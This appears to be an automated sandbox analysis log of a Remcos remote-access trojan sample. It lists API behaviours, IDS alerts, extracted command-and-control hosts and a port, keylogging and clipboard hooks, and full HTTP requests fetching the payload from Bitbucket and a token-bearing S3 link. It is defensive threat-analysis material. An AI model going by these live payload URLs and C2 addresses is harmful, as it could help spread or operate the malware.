              Source: Binary string: ping.pdb source: esentutl.exe, 00000008.00000003.2265634215.00000000055D0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 0000000C.00000002.2390214130.0000000000841000.00000020.00000001.01000000.00000008.sdmp, xpha.pif.8.dr
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D35908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02D35908
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_0292B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,6_2_0292B335
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_0293B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,6_2_0293B42F
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_0296D5E9 FindFirstFileExA,6_2_0296D5E9
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_0292B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,6_2_0292B53A
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02927A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,6_2_02927A8C
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02926AC2 FindFirstFileW,FindNextFileW,6_2_02926AC2
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_029289A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,6_2_029289A9
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02938C69 FindFirstFileW,FindNextFileW,FindNextFileW,6_2_02938C69
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02928DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,6_2_02928DA7
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E40207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,9_2_00E40207
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E4589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,9_2_00E4589A
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E44EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,9_2_00E44EC1
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E53E66 FindFirstFileW,FindNextFileW,FindClose,9_2_00E53E66
              Source: C:\Users\Public\alpha.pifCode function: 9_2_00E3532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,9_2_00E3532E
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E4589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,11_2_00E4589A
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E40207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,11_2_00E40207
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E44EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00E44EC1
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E53E66 FindFirstFileW,FindNextFileW,FindClose,11_2_00E53E66
              Source: C:\Users\Public\alpha.pifCode function: 11_2_00E3532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,11_2_00E3532E
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_0294B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,19_2_0294B335
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_0295B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,19_2_0295B42F
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_0298D5E9 FindFirstFileExA,19_2_0298D5E9
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_0294B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,19_2_0294B53A
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_02947A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,19_2_02947A8C
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_02946AC2 FindFirstFileW,FindNextFileW,19_2_02946AC2
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_029489A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,19_2_029489A9
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_02958C69 FindFirstFileW,FindNextFileW,FindNextFileW,19_2_02958C69
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_02948DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,19_2_02948DA7
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02926F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,6_2_02926F06

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49730 -> 104.243.42.254:5874
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49785 -> 104.243.42.254:5874
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49856 -> 104.243.42.254:5874
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49914 -> 104.243.42.254:5874
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49967 -> 104.243.42.254:5874
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50018 -> 104.243.42.254:5874
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50031 -> 104.243.42.254:5874
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50032 -> 104.243.42.254:5874
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50030 -> 104.243.42.254:5874
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50028 -> 104.243.42.254:5874
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50033 -> 104.243.42.254:5874
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: https://bitbucket.org/masterservicwes/mastermanservices/downloads/165_Dlaybpxloke
              Source: Malware configuration extractorURLs: zara.master-workdone.com.ua
              Source: Malware configuration extractorURLs: manazara.master-workdone.com.ua
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D4E4B8 InternetCheckConnectionA,0_2_02D4E4B8
              Source: global trafficTCP traffic: 192.168.2.6:49730 -> 104.243.42.254:5874
              Source: Joe Sandbox ViewIP Address: 185.166.143.50 185.166.143.50
              Source: Joe Sandbox ViewASN Name: RELIABLESITEUS RELIABLESITEUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 3.5.30.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49716 -> 185.166.143.50:443
              Source: global trafficHTTP traffic detected: GET /masterservicwes/mastermanservices/downloads/165_Dlaybpxloke HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
              Source: global trafficHTTP traffic detected: GET /03fa479d-619a-4b32-874d-a4ddf918e902/downloads/2601acd3-63c3-4b6f-aebd-6df9054b3482/165_Dlaybpxloke?response-content-disposition=attachment%3B%20filename%3D%22165_Dlaybpxloke%22&AWSAccessKeyId=ASIA6KOSE3BNPUMJB2N4&Signature=lPpKAn0ReHQbH3DpienqaxZzNLo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEHIaCXVzLWVhc3QtMSJIMEYCIQCaZkGDFyxBoRgAK4dmP5GUp0SY87BURv7X14RQrwEcZgIhAMetywssY5BhL8pY%2FtG26ZU6vERKuy%2FAVKUuXoBcCnK1KqcCCCsQABoMOTg0NTI1MTAxMTQ2IgyUI9V0VJ8H5yjEvdkqhALsEBIC2rYjECe9FxMRnaue0tWUjriw4Hncuptkdwv33JFaLSq5PAcZ7j0wHx5XTplvXQu0B%2BAVF%2BA7w7OoltUA9YEMD1dli4GhwmLw98H7TnsbJxv%2FAfH5jmYjDgNSeefRwq6dAL84iBBiGO%2BTcrZRP0bRK0UmrAMflcU24c9z1OpZvZUoh8xhJivA3GqRpKweY6B3FcJAT%2FE3nJCW9heW4uO%2FwIjWxMnZfhnXKm8yFawEBgORWNzIvaslhtOM4sRJxbEPTznZKwjZYmaP1oFmi66IfRK6h10tQ%2Ffh58rfDiVaxxUtMhmVces3NbVCtUDHXTZO01oYfFXpzFfw1Iokuk5LEzCjksu6BjqcARY%2FAHp8g2KBhslGF9Frk4I8oled3sypm%2FnQFVM%2BPCh2Z44y5IQLfMLnMkgcML2U3jqY%2F2%2BStuIb%2BFoD99teigmj8%2BuaolR%2BMXe%2FGwZ7UgMk%2FRQdZKpZro%2F6dfGCGZytk7EGcfIrQ5l%2F7x%2BltpFGD%2F65w%2BoCYBUwnHQOgiJLucLeN8XglIkhzkhQFYiFvroeURjDmWQBwBq5NvFGgQ%3D%3D&Expires=1733480491 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_029460F7 recv,6_2_029460F7
              Source: global trafficHTTP traffic detected: GET /masterservicwes/mastermanservices/downloads/165_Dlaybpxloke HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
              Source: global trafficHTTP traffic detected: GET /03fa479d-619a-4b32-874d-a4ddf918e902/downloads/2601acd3-63c3-4b6f-aebd-6df9054b3482/165_Dlaybpxloke?response-content-disposition=attachment%3B%20filename%3D%22165_Dlaybpxloke%22&AWSAccessKeyId=ASIA6KOSE3BNPUMJB2N4&Signature=lPpKAn0ReHQbH3DpienqaxZzNLo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEHIaCXVzLWVhc3QtMSJIMEYCIQCaZkGDFyxBoRgAK4dmP5GUp0SY87BURv7X14RQrwEcZgIhAMetywssY5BhL8pY%2FtG26ZU6vERKuy%2FAVKUuXoBcCnK1KqcCCCsQABoMOTg0NTI1MTAxMTQ2IgyUI9V0VJ8H5yjEvdkqhALsEBIC2rYjECe9FxMRnaue0tWUjriw4Hncuptkdwv33JFaLSq5PAcZ7j0wHx5XTplvXQu0B%2BAVF%2BA7w7OoltUA9YEMD1dli4GhwmLw98H7TnsbJxv%2FAfH5jmYjDgNSeefRwq6dAL84iBBiGO%2BTcrZRP0bRK0UmrAMflcU24c9z1OpZvZUoh8xhJivA3GqRpKweY6B3FcJAT%2FE3nJCW9heW4uO%2FwIjWxMnZfhnXKm8yFawEBgORWNzIvaslhtOM4sRJxbEPTznZKwjZYmaP1oFmi66IfRK6h10tQ%2Ffh58rfDiVaxxUtMhmVces3NbVCtUDHXTZO01oYfFXpzFfw1Iokuk5LEzCjksu6BjqcARY%2FAHp8g2KBhslGF9Frk4I8oled3sypm%2FnQFVM%2BPCh2Z44y5IQLfMLnMkgcML2U3jqY%2F2%2BStuIb%2BFoD99teigmj8%2BuaolR%2BMXe%2FGwZ7UgMk%2FRQdZKpZro%2F6dfGCGZytk7EGcfIrQ5l%2F7x%2BltpFGD%2F65w%2BoCYBUwnHQOgiJLucLeN8XglIkhzkhQFYiFvroeURjDmWQBwBq5NvFGgQ%3D%3D&Expires=1733480491 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
              Source: global trafficDNS traffic detected: DNS query: bitbucket.org
              Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
              Source: global trafficDNS traffic detected: DNS query: zara.master-workdone.com.ua
              Source: global trafficDNS traffic detected: DNS query: manazara.master-workdone.com.ua
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: SndVol.exeString found in binary or memory: http://geoplugin.net/json.gp
              Source: jW3NEKvxH1.exe, 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, SndVol.exe, 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
              Source: jW3NEKvxH1.exe, jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145952303.0000000002856000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2293566287.000000007FAB0000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266672340.0000000002854000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F96F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
              Source: jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
              Source: jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/03fa479d-619a-4b32-874d-a4ddf918e902/downloads/2601acd3-63c3-
              Source: jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/03fa479d-619a-4b32-874d-a4ddf918e902/downloads/2601acd3-6
              Source: jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000819000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/
              Source: jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020B1D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/masterservicwes/ma
              Source: jW3NEKvxH1.exe, 00000000.00000002.2265349899.00000000007AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/masterservicwes/mastermanservices/downloads/165_Dlaybpxloke
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.6:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 3.5.30.3:443 -> 192.168.2.6:49718 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to register a low level keyboard hook
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_029299E4 SetWindowsHookExA 0000000D,029299D0,000000006_2_029299E4
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02935A45 OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_02935A45
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_029359C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_029359C6
